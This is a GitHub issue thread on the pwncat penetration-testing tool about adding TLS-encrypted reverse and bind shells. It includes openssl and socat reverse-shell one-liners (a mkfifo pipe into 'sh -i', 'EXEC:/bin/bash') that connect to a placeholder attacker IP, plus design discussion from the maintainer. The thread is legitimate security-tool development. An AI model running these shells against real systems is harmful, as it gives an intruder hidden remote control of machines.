### ISSUE TITLE
Encrypted shells with `pwncat`

### ISSUE THREAD

**Issue by Mitul16** [calebstewart/pwncat#118]
> NOTE: I am not sure if this will fit with your current methods and features

**Is your feature request related to a problem? Please describe.**
No, my feature request is not related to any problem.

**Describe the solution you'd like**
Given the _benefits and features_ of this _amazing_ tool, thanks to `calebstewart` and __team__.
It will be amazing to have an option (like `--encrypt`) that allows an _attacker_ to `encrypt` his/her __connection__ with the `victim machine`

We can utilize `openssl` to achieve this.

```bash
# select any reasonable amount of time as `-days VALIDITY`, like a day or two
# we can completely ignore this validity check on the client/victim side with `-no_check_time`

# create a self-signed certificate, to be used while creating a connection (using type RSA with 4096 bits)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 1 -nodes

# Start a server to listen for the incoming connections
openssl s_server -quiet -key key.pem -cert cert.pem -port PORT
```

```bash
# On the victim machine, invoke the following commands
if [ -p /tmp/f ]; then
    rm /tmp/f
fi

mkfifo /tmp/f
cat /tmp/f | sh -i 2>&1 | openssl s_client -quiet -connect IP:PORT > /tmp/f
rm /tmp/f
```

I did some analysis of the whole `pwncat` and `victim` interaction, all those `echo ...; get_information; echo ...;` stuff.
Given an option like `--encrypt` is supplied, we can check for the `openssl` binary and any other requirements for the same.
This can be done before or after `pwncat` does its _wizardry_ behind the scenes stuff, that is the required __system checks__ and all of the __good automation stuff__.
But this needs to be done before `pwncat` _stabilises the shell_.

**Describe alternatives you've considered**
There can be multiple ways to achieve the same functionality, I have only provided one such method that I have tested myself.
There is `ncat --ssl` as well, it requires you to have the `key` file saved on the `victim machine`.

**Additional context**
Here are some pictures showing the process discussed above.

### Creating required keys and starting the listener
![image-1](https://user-images.githubusercontent.com/44923300/121775940-faa49880-cba7-11eb-8136-531b4bf100c5.png)

### Invoking the connection from the victim machine
![image-2](https://user-images.githubusercontent.com/44923300/121775976-29bb0a00-cba8-11eb-856c-49fd8e989ca5.png)

### Stabilizing the shell
![image-3](https://user-images.githubusercontent.com/44923300/121775988-33447200-cba8-11eb-9134-44060cfbbbd3.png)

### Unencrypted connection (Here, I have used my keys to decrypt the TLS traffic, but it is similar for a normal unencrypted connection)
![image-4](https://user-images.githubusercontent.com/44923300/121776043-73a3f000-cba8-11eb-9f1b-54045c9cb9f6.png)

### Encrypted connection
![image-5](https://user-images.githubusercontent.com/44923300/121776053-7d2d5800-cba8-11eb-9f80-80a093ed32c4.png)

**Comment by calebstewart** [comment]
First of all, I really appreciate the in depth research on this! Next, just to comment on the "magic" of what happens in pwncat, here's a quick rundown that may help clear things up:

- Manager.create_session is called
- If a protocol type is specified explicitly, we lookup the matching `Channel` class
- Otherwise, we try to intelligently "guess" the protocol based on the context of the arguments.
- The selected `Channel` constructor is called. This normally performs the actual socket connect for outgoing protocols (think `connect` or `ssh`) or starts the listener for incoming protocols (think `bind`/`--listen`)
- The `Channel` is only responsible for constructing a tunnel by which we can talk to a shell on the other end. This is the logical place for encryption to happen.
- After a `Channel` is constructed, the `Platform` class is looked up based on the platform name. The `Platform` is what decides what to actually sent over the channel, since all commands are inherently platform-dependent.
- We construct a platform and give it the existing channel. The platform does things like starting a PTY if needed, and executing commands, opening files, etc. Generally speaking, nothing in pwncat interacts with the channel except the `Platform` object.

I think the most logical place for this to be implemented would be as a separate protocol (e.g. a new `Channel` class), similar to how `socat` handles it. If there was a `Channel` implemented for SSL-wrapped sockets, it could be registered with the names `ssl-connect` and `ssl-bind`.

pwncat doesn't concern itself with how you get a compatible payload to the target, so in those cases, you'd just need to use either an `openssl`-wrapped socket, `socat`, or `ncat --ssl` to get a compatible listener/client. The hard part then becomes keys. pwncat can't do anything to help here, because we haven't established a session to enable uploading files, and the session needs the keys to start.

On the other hand, it may be possible to "upgrade" an existing session to encrypted, but it would likely require writing a stub in Python or something to actually wrap the existing stdio file-like objects in something that looks like a socket, and then wrapping that in an SSL context. The pwncat `Platform` object *could* replace it's own Channel with a wrapper which slaps an SSL context on top of the existing socket, so this feasible, but would depend on something like Python being available on the target, and would happen *after* establishing the session. This could happen automatically. For example, during `Linux` platform initialization, we could:

- Establish unencrypted session to target
- Resolve `python` to ensure we have the necessary binary
- Deploy stub to victim to establish SSL-context
- Wrap existing `Channel` in an SSL-context
- Continue setup/execution as normal

That would **need** to happen in the Platform because outside of the platform, nothing else knows how to execute commands on the target generically.

**Comment by calebstewart** [comment]
I'm giving this a go on the `issue-118-ssl-bind` branch. Currently running into some weird problems that appear only over encrypted sessions, but fundamentally it's working. There is not currently any way to use it from the entrypoint, but you can create a session from the API. Once I get this hammered out, I'll add the entrypoint arguments. From the API, it looks like this:

```py
#!/env/bin/python
import json
import stat
import time
import shutil
import subprocess

import pwncat.manager
import pwncat.platform.windows

# Create a manager
with pwncat.manager.Manager("data/pwncatrc") as manager:

    # Tell the manager to create verbose sessions that
    # log all commands executed on the remote host
    # manager.config.set("verbose", True, glob=True)

    # Establish a session
    session = manager.create_session(
        "linux", certfile="/tmp/cert.pem", keyfile="/tmp/cert.pem", port=4444
    )

    manager.interactive()
```

With a reverse shell on the target:

```sh
openssl OPENSSL:127.0.0.1:4444,verify=0 EXEC:/bin/bash,stderr
```

**Comment by calebstewart** [comment]
`ssl-connect` doesn't require any new arguments to the entrypoint, though so that is currently working with:

```sh
pwncat -m linux ssl-connect://127.0.0.1:4444
```

![image](https://user-images.githubusercontent.com/7529189/121831895-ac21f780-cc96-11eb-9a74-46de900d26d5.png)

**Comment by calebstewart** [comment]
Also, for what it's worth, this works with a Windows target using `ncat --ssl`

![image](https://user-images.githubusercontent.com/7529189/121832392-f0fa5e00-cc97-11eb-9110-e3ec29133c01.png)

**Comment by Mitul16** [comment]
First of all, I apologize for my _inactivity_
`pwncat` is going through a major _upgrade_, which is very nice
I am currently trying to understand the new `framework`, and making some modifications to some modules (`channel/channel.py`, `platform/*`, ...) to get it working without issues

![Screenshot from 2021-06-14 16-52-59](https://user-images.githubusercontent.com/44923300/121884947-2b640980-cd31-11eb-8557-59ee192f121f.png)

**Comment by calebstewart** [comment]
You're right that I think my logic was flawed initially that keys *need* to be transferred. However, you'll need to generate a self-signed cert/key for a bind shell on the target.

## Spawning a New Encrypted Session

Using the first unencrypted session to open a second encrypted session is totally possible. That would probably be best implemented as a module. The platform separation could then be done by placing the modules in their respective platform-specific directories (e.g. `pwncat/modules/linux` or `pwncat/modules/windows`). There could be something like `manage.reconnect` with an encrypted option so that the user could run something like:

```sh
# At the pwncat prompt, tell the active session to reconnect with an encrypted session
# Might need more options for things like RPORT/RHOST information, but you get the idea.
run manage.reconnect encrypted
```

This module could select an appropriate method (e.g. using Python w/ `ssl` to reconnect or maybe using `openssl` for relatively standard bind/reverse shell or even using `ncat` or `socat` to handle the dirty work for us if they're available).

## Upgrading Existing Unencrypted Sessions

This is tricky. I was looking into this last night, and I'm not sure it's possible without the stager implementing a fair amount of low-level SSL routines. The Python `ssl` module only works with sockets, so there's no way to wrap a file-like object (even if stdio is technically connected to a socket upstream).

## `ssl-connect` and `ssl-bind`

These are separate channels which assume the attacker is running something like `ncat --ssl` or `socat OPENSSL-LISTEN:`. They are implemented in a branch at the moment (branch name in previous comment), which I will likely merge today once I get the entrypoint and `connect` command arguments worked out to support more complicated channel arguments.

## Other Problems You Mentioned

I appreciate you giving this a go, and finding issues, but for the sake of organization/clarity (and my sanity trying to track this :stuck_out_tongue_closed_eyes: ), could you please open a separate issue if you're seeing problems not related to encrypted shells? :+1:

**Comment by Mitul16** [comment]
I have moved the issues to a separat Issue https://github.com/calebstewart/pwncat/issues/126

**Comment by calebstewart** [comment]
#129 is broken, and refused to disconnect from this issue. I've merged #139 which implements support for SSL-encrypted reverse and bind shells, which works for both Windows and Linux. They are currently present in the `release-0.5.0` branch, and will be available once v0.5.0 is formally released. I believe the module which triggers a reconnect over encrypted channels is out of scope here, but is definitely worth exploring in the future. With that in mind, I'm going to close this issue.
